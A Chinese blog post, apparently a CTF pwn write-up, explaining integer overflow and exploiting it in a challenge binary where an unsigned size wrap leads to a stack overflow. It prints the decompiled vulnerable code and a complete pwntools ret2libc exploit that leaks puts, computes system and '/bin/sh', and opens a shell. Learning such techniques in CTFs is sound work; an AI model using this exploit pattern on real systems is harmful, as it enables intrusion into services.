简单的整数溢出

最新推荐文章于 2023-11-19 15:53:12 发布
最新推荐文章于 2023-11-19 15:53:12 发布
阅读量2.8k 收藏 4
点赞数 1
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pwnpanda/article/details/85000181
版权

首先说一下原理

为什么会出现整数溢出?

因为机器底层只能处理01串,也就是说底层本身是无法识别有符号数和无符号数的,这些规定是存在于编辑器层面,在C语言中,整数的基本类型有以下几种(图片来源:CTF Wiki

在这里插入图片描述

溢出又分上溢出和下溢出

上溢出:

当出现0x7fff+1,或者0xffff+1的时候,假设0x7fff是无符号数,那么+1之后就是0

下溢出:

例如0x0000-1 -> 0xffff

总的来说,利用技巧就是利用代码里有符号和无符号数之间的转换问题,恶意将某个关键数值改的超大或者很小

正式做题

这个题本身应该不难,但是这个代码看着太恶心了,没有完全理解清楚

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *v3; // rsp@1
  void *v4; // rsp@3
  int v6; // [sp+Ch] [bp-24h]@1
  void *dest; // [sp+10h] [bp-20h]@3
  int v8; // [sp+1Ch] [bp-14h]@3
  _DWORD *v9; // [sp+20h] [bp-10h]@1 4字节类型
  void *buf; // [sp+28h] [bp-8h]@1

  v6 = argc;
  init_stdio();
  puts("welcome.....");
  v3 = alloca(32LL);
  buf = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
  read(0, (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), 0xCuLL);
  v9 = buf;
  if ( *(_DWORD *)buf != 1852402515 || v9[1] != 1 )
  {
    puts("some thing wrong");
  }
  else
  {
    v8 = v9[2] + 32;
    v4 = alloca(16 * (((unsigned __int64)(unsigned int)v8 + 30) / 0x10));// 整数溢出
    dest = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
    memcpy((void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), buf, 0xCuLL);
    read(0, (char *)dest + 12, v9[2]);          // 栈溢出
    handle_data();
  }
  return 0;
}

问题就出在else里面,v8是int型,但是这个地方却被作为无符号数处理,在机器里,底层是不会区分有符号数和无符号数,有符号和无符号是在编译层面才区分的,所以这个地方就可以进行一下整数溢出,修改能传入的数据大小限制,然后再利用栈溢出,获得shell

  else
  {
    v8 = v9[2] + 32;
    v4 = alloca(16 * (((unsigned __int64)(unsigned int)v8 + 30) / 0x10));// 整数溢出
    dest = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
    memcpy((void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), buf, 0xCuLL);
    read(0, (char *)dest + 12, v9[2]);          // 栈溢出
    handle_data();
  }

exp:

使用p32的是因为,最初输入的地方,是buf,buf和v9是一个类型,都是dword,所以要用p32

from pwn import *

# context.log_level = 'debug'

p = process('./pwn')
r = ROP('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi = r.find_gadget(['pop rdi','ret']).address

info("pop_rdi_ret: {}".format(hex(pop_rdi)))

p.recvuntil('welcome.....')

payload1 = p32(0x6e696b53)
payload1 += p32(0x1)
payload1 += p32(0xffffffff)
p.send(payload1)

# p.send('a'*200)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

payload2 = cyclic(124)
payload2 += p64(pop_rdi)
payload2 += p64(puts_got)
payload2 += p64(puts_plt)
payload2 += p64(elf.entry) 
p.send(payload2)

p.recvline()

puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = puts_addr - libc.symbols['puts']
info("libc_base: {}".format(hex(libc_base)))

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()

payload3 = p32(0x6e696b53)
payload3 += p32(0x1)
payload3 += p32(0xffffffff)
p.send(payload3)

payload4 = cyclic(124)
payload4 += p64(pop_rdi)
payload4 += p64(binsh_addr)
payload4 += p64(system_addr)
payload4 += p64(elf.entry)
p.send(payload4)

# gdb.attach(p)

p.interactive()

如果不知道cyclic(124)中的124是咋来的,继续往下看:

首先说明,attach后面那个send()里的字符串是使用pattern create生成的,执行下面这个脚本,然后按下’c’,即可正常寻找栈溢出偏移

from pwn import *

# context.log_level = 'debug'

p = process('./pwn')
r = ROP('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi = r.find_gadget(['pop rdi','ret']).address

info("pop_rdi_ret: {}".format(hex(pop_rdi)))

p.recvuntil('welcome.....')

payload1 = p32(0x6e696b53)
payload1 += p32(0x1)
payload1 += p32(0xffffffff)
p.send(payload1)

gdb.attach(p)
p.send('aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaa')

p.interactive()
Pwnpanda
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN-整数溢出
山高路远
04-06 914
整数溢出 基础知识 数据类型以及所取的范围(环境为64位下使用gcc-5.4) 类型 字节 范围 short int 2byte(word) 0~32767(0~0x7fff) -32768~-1(0x8000~0xffff) unsigned short int 2byte(word) 0~65535(0~0xffff) int 4byte(dword) 0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xfffffff
Pwn_整数溢出
m0_56897090的博客
08-18 214
调用者: 被调用函数: 条件:size=0 | i=0 为什么i <= (size-1)能通过呢? 原来是[[整数溢出]],(size-1)该变量的类型原先是无符号整数(unsigned int64) ↓ 当size=0,size=size-1=-1(0xffff),汇编对于无符号负数转换:下界溢出 -1转换为无符号数是4294967295 所以i<=(size-1) ...
整数溢出原理分析【转载】
weixin_30390075的博客
08-31 1080
课程简介 我们之前所研究的漏洞,都是非常经典的栈溢出漏洞,也是最为常见的漏洞形态。但是我们对于缓冲区溢出的学习,是不能够仅仅局限在这类的漏洞里面的,其实还有一些比较少见,但却值得我们注意的漏洞形式,是需要我们进行研究的。在接下来的几次课程中,就对这些漏洞逐一进行分析。而我这次所讲的,是整数溢出的漏洞。 课程介绍 实验环境: 操作机:Windows XP ...
PWN–整数溢出
最新发布
qq_74259765的博客
11-19 647
转自ctfwiki-整数溢出部分
整数溢出1
08-08
整数溢出是一种常见的编程错误,特别是在处理数值计算时,可能会导致不可预见的程序行为。在计算机科学中,整数的表示是有固定宽度的,这通常由编程语言或硬件架构决定。例如,32位整数可以表示从 -2^31 到 2^31-1 ...
Python 的整数与 Numpy 的数据溢出
09-18
这意味着在 Python 3 中,即使进行大整数运算,也不需要担心整数溢出问题,因为系统会自动处理内存需求,只要不超过系统的实际内存限制。 Numpy,作为一个基于 C 语言实现的库,遵循 C 语言的整数类型规则。Numpy ...
C++整数溢出的例子
10-23
一个程序例子 适用于刚开始学习C++学习的同学
ERC20智能合约整数溢出系列漏洞披露
10-16
【ERC20智能合约整数溢出系列漏洞披露】揭示了智能合约在区块链安全领域面临的严峻挑战。自2016年的The DAO事件以来,智能合约已成为安全问题的热点,其中包括了诸如BEC、BAI、EDU等多个案例,最近EOS的漏洞也展示了...
Google Chrome Skia整数溢出漏洞
05-05
Google Chrome Skia整数溢出漏洞
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
pwn 整型溢出
清霂的博客
03-09 426
目录int_overflow 攻防世界r2t3 BUUoverflow int_overflow 攻防世界 file checksec ida32,进入login 输入一个用户名,再输入一个passwd,都无法直接栈溢出,进入check_passwd 发现v3是输入passwd的长度,v3是unsigned __int8类型范围是0~255 如果s的长度超过255,会变为(对s长度取模运算)得到的值。而s的长度不能大于0x199(409),取模后 v3>3&&v3<=
pwn学习(整数溢出
至臻求学,胸怀云月
01-31 3062
整数溢出 ctf-wiki基础知识 请先浏览上述链接 类型 字节 范围 short int 2byte 0~0x7fff 0x8000~0xffff unsigned short int 2byte 0~0xffff int 4byte 0~0x7fffffff 0x80000000~0xffffffff unsigned int 4byte 0~0xffffffff ...
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1884
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
pwn刷题num39----整数溢出
tbsqigongzi的博客
05-02 439
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看一下主函数 char buf; // [rsp+0h] [rbp-10h] ..... ...... ...... ........ if ( (signed int
整型的溢出详解
gao_zhennan的博客
10-13 8544
前言:本文介绍的整型的溢出并不针对某种编程语言,通过数在机器中存储的方式,说明为什么会存在溢出以及溢出后数的实际存储情况。 一、什么是溢出(理解即可) 当我们在计算机中要存储的数超出了该类型数可以表示的范围就会发生溢出。例如,Java中的byte类型数据范围为[-128,127],你想要存储的数为128,此时会发生上溢;要存储的数为-129,此时会发生下溢。其核心思想是超出可以表示的范围。就像向杯子中倒水,水超出了杯子的容量,就会溢出来。 二、为什么会发生溢出 前文已经有所介绍:超出了可以表示的范围。 .
关于shell脚本使用函数返回整型产生范围溢出的问题
weixin_52558791的博客
08-18 459
但是return 返回整型数值有一个范围限定,在0-255之间。按照正常情况,返回值应该为300。
漏洞学习笔记——栈和整数溢出原理
谈成(C/C++)
04-15 554
1.栈溢出原理 栈溢出之所以可以修改EIP,是利用局部变量和返回地址是同时保存在栈中的。 当调用call命令时,会将下一条指令的地址push到栈中,然后进入call函数。 而在call函数中,局部变量也会继续在同一个栈中保存。所以当复制字符串时,就有可能向下溢出,将返回地址给覆盖了。这就导致retn时,将被覆盖的返回地址pop到EIP中执行。 2.整数溢出原理 整数溢出其实是利用了整数存在上限的问题。比如一个USHORT类型的数据,他的上限就是65535,当你给他输入65536..
【PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 933
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出
appscan整数溢出漏洞修复
06-09
整数溢出漏洞是一种非常常见的安全漏洞,可以通过以下几种方式来修复: 1. 使用无符号整数:在代码中使用无符号整数,这样可以避免整数溢出问题。 2. 检查输入参数:在处理输入参数时,对输入参数进行检查和验证,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值